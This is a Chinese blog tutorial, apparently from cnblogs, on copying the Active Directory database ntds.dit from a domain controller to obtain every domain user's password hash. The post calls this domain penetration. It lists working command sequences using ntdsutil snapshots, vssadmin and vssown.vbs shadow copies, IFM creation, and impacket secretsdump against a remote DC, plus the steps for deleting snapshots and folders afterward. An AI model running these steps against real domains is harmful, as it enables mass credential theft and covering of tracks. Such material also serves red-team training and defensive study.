首页 > 其他分享 >多种方式提取和移动ntds

多种方式提取和移动ntds

时间:2023-06-16 16:46:22浏览次数:34  
标签:exe 提取 ntds 副本 卷影 dit 移动

多种方式提取和移动ntds.dit文件

目录

一、ntds.dit文件的介绍

ntds.dit为Windows Active Directory数据库的一个文件,内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、 sd表。所以只要在域渗透中能够获取到ntds.dit就可以获取到所有域用户的用户名和对应的hash,它和SAM文件一样,被windows系统锁死。

ntds.dit文件位置:

C:\Windows\NTDS

二、ntdsutils.exe提取ntds.dit

ntdsutils.exe 是一个为活动目录提供管理机制的命令行工具,使用 ntdsutils.exe 可以维护和管理活动目录数据库、控制单个主机操作、创建应用程序目录分区等,该工具默认安装在域控服务器上,可以在域控制器上直接操作,支持windows server 2003、2008、2012。

1、创建快照

ntdsutil.exe snapshot "activate instance ntds" create q q

2、加载快照

ntdsutil.exe snapshot "mount {e5440db6-0ffa-47fa-9510-5708bc2f96b2}" q q

3、复制文件

copy C:\$SNAP_202306161355_VOLUMEC$\windows\NTDS\ntds.dit C:\Users\Administrator\Desktop

4、删除快照

ntdsutil.exe snapshot "umount {e5440db6-0ffa-47fa-9510-5708bc2f96b2}" "delete {e5440db6-0ffa-47fa-9510-5708bc2f96b2}" q q

三、vssadmin提取ntds.dit

vssadmin是Windows Server 2008及Windows 7系统提供的VSS管理工具,它可以用于创建或删除卷影副本,列出卷影副本的信息(只能管理系统Provider创建的卷影副本)。还可以用于显示所有安装的所有卷影副本写入程序(writers)和提供程序(providers),以及改变卷影副本存储空间(即所谓的 “diff空间”)的大小等。支持的操作系统:Server 2008、Server 2012。

1、创建快照

vssadmin create shadow /for=c:

2、复制文件

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\NTDS\ntds.dit C:\Users\Administrator\Desktop

3、删除快照

vssadmin delete shadows /for=c: /quiet

四、vssown.vbs提取ntds.dit

vssown.vbs和vssadmin类似,它是由Tim Tomes开发完成的,它可以创建和删除卷影副本,以及启动和停止卷影复制服务。

1、启动卷影复制服务

cscript vssown.vbs /start

2、创建一个C盘的卷影副本

cscript vssown.vbs /create c

3、列出当前卷影副本

cscript vssown.vbs /list

4、复制文件

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\NTDS\ntds.dit C:\Users\Administrator\Desktop

5、删除卷影副本

cscript vssown.vbs /delete {A60DA168-8678-4A85-A244-874250A93C1F}

五、IFM提取ntds.dit

可以通过创建一个IFM 的方式获取ntds.dit,在使用 ntdsutil 创建媒体安装集(IFM)时,需要进行生成快照、加载、将 ntds.dit 和计算机的 SAM 文件复制到目标文件夹中等操作,这些操作也可以通过 PowerShell 或 VMI 远程执行。

1、生成文件

ntdsutil "ac i ntds" "ifm" "create full c:/test" q q

此时 ntds.dit 将被保存在 C:\test\Active Directory 下,SYSTEN 和 SECURITY 两个文件将被保存在 C:\test\registry 文件夹下。

2、删除目录

rmdir /s/q C:\test

六、secretsdump.exe提权ntds.dit

通过 impacket 里的 secretsdump.py 脚本可以直接远程读取 ntds.dit 并导出哈希值。

secretsdump.exe 域名/administrator:密码@IP -outputfile output_ntds

这里密码之前是admin@123,但是会冲突,导致会去访问[email protected]的445端口,从而访问失败。所以改了密码。

secretsdump.exe candada/administrator:[email protected] -outputfile output_ntds

标签:exe,提取,ntds,副本,卷影,dit,移动
From: https://www.cnblogs.com/candada/p/17485923.html

相关文章

  • Matlab正态分布、历史模拟法、加权移动平均线 EWMA估计风险价值VaR和回测标准普尔指数
    原文链接:http://tecdat.cn/?p=24480 最近我们被客户要求撰写关于风险价值的研究报告,包括一些图形和统计输出。此示例说明如何使用三种方法估计风险价值(VaR)并执行VaR回测分析。这三种方法是:正态分布历史模拟指数加权移动平均线(EWMA)风险价值是一种量化与投......
  • 移动端兼容问题列表
    伪类:active生效要CSS伪类 :active 生效,只需要给document绑定 touchstart 或 touchend 事件<style>a{color:#000;}a:active{color:#fff;}</style><aherf=foo>bar</a><script>document.addEventListener('touchstart',fun......
  • 浓盐法提取DNA
    原理核酸和蛋白质在生物体中常以核蛋白(DNP/RNP)的形式存在 DNP能溶于水及高浓度盐溶液,但在0.14M的盐液中解度很低, RNP则可溶于低盐溶液,因此可利用不同浓度的NaCl溶液将其从样品中分别抽提出来DNA和蛋白质,用将抽提得到的DNP用SDS处理可将其分离DNA上清,加入冷乙醇......
  • 利用Taro打造敏捷的移动App架构
    什么是Taro?Taro(或称为Taro框架)是一种用于构建跨平台应用程序的开源JavaScript框架。它基于React和ReactNative,可以用于开发Web、iOS、Android和微信小程序等平台上的应用程序。Taro的目标是实现一套代码多端运行的方案,开发者可以使用一套React语法编写代码,然后通过Taro编译器将......
  • SMB远程执行命令横向移动
    SMB远程执行命令横向移动目录SMB远程执行命令横向移动一、SMB介绍二、smbexec.exe上线CS一、SMB介绍SMB全称是ServerMessageBlock翻译过来是服务器信息块,它也是一种客户端到服务器的通信协议。除此之外,SMB协议也被称为请求-回复协议。客户端与服务器建立连接后,客户端可......
  • DCOM远程执行命令横向移动
    DCOM远程执行命令横向移动目录DCOM远程执行命令横向移动一、DCOM介绍二、获取DCOM列表三、DCOM横向条件四、MMC20.Application远程执行命令五、ShellWindows远程执行命令六、ShellBrowserWindow远程执行命令七、调用Excel.Application远程执行命令八、Visio.Application远程执行......
  • WinRM远程执行命令横向移动
    WinRM远程执行命令横向移动目录WinRM远程执行命令横向移动一、WinRM介绍二、WinRM进行横向移动一、WinRM介绍WinRM(Windows远程管理)是Microsoft在Windows中对WS-Management的实现,它使系统可以跨通用网络访问或交换管理信息。利用脚本对象或内置的命令行工具,WinRM可以与可能具有......
  • opencv 视频提取
    视频提取importcv2importmatplotlibaspltimportnumpyaspy#cv2.VideoCapture可捕获摄像头用数字控制不同设备,如0,1#如果是视频文件直接指定路径即可。vc=cv2.VideoCapture('C:/Users/59925/Desktop/pytest/video/video_minions.mp4')ifvc.isOpened():#判断图像是......
  • EasyCVR移动端火狐浏览器中云台显示问题的优化
    EasyCVR视频融合平台基于云边端一体化架构,具有强大的数据接入、处理及分发能力,平台能对前端接入设备进行统一集中管理,支持采用设备树对设备进行分组、分级管理,支持设备状态监测、云端运维等功能,实现对接入资源的集中控制与权限分配。有用户反馈,在移动端使用火狐浏览器,发现EasyCV......
  • opencv 图片处理/颜色通道提取/截取感兴趣部分图片
    图片处理importcv2#=============================#截取图像某一部分ROI(regionofinterest)mini=cv2.imread('C:/Users/59925/Desktop/pytest/pics/minions-s.jpg')print(mini.shape)cut_mini=mini[0:150,0:150]cv2.imshow('img',cut_mini)#============......